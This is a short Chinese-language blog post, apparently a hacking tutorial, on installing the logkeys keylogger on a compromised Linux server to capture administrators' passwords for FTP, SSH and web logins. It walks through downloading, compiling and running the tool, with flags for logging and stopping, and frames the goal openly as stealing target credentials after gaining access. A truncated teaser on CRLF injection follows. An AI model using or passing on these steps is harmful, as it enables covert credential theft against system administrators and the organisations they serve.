拿到Linux服务器的权限后,我们可以在机器上运行一个记录键盘的小工具,来记录管理员平时输入的一些密码。有时候用处很大,比如管理员登录ftp/ssh,我们就可能得到目标密码和很多管理员常用密码。
logkeys:https://code.google.com/p/logkeys/
下载下来源代码。
首先解压:
tar -vxzf logkeys-0.1.1a.tar.gz
进入解压后到build目录并运行父目录里的configure,配置编译选项:
cd logkeys-0.1.0/build ../configure
一开始我也在想,为何要进入build目录再运行父目录下的文件(Linux小白感觉多此一举),后来问了一下才知道,不想因为编译弄乱logkeys-0.1.0目录下的东西,所以进到build目录。
然后编译:
make install
make需要root权限。获取一下即可。
编译成功以后我们就可以使用了,先看看帮助:
很简单方便。一般用到三个参数:
-s 开始监听
-u 使用US键位进行替代默认键位。这个很重要,如果不加这个参数到话抓到的东西不对。
-o 输出文件
于是,我们先新建一个文件:
touch key.log
然后运行logkes即可:
logkeys -suo key.log
可以试试,登录一下webqq,果然记录下了密码:
需要停止时:
logkeys -k
kill掉即可。
一、漏洞详解 CRLF是”回车 + 换行”(rn)的简称。在HTTP协议中,HTTP Header与HTTP Body是用两个CRLF分隔的,浏览器就是根据这两个CRLF来取出HTTP 内容并显示出来。所以,一旦我们能够控制HTTP 消息头中的字符,注入一些恶…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册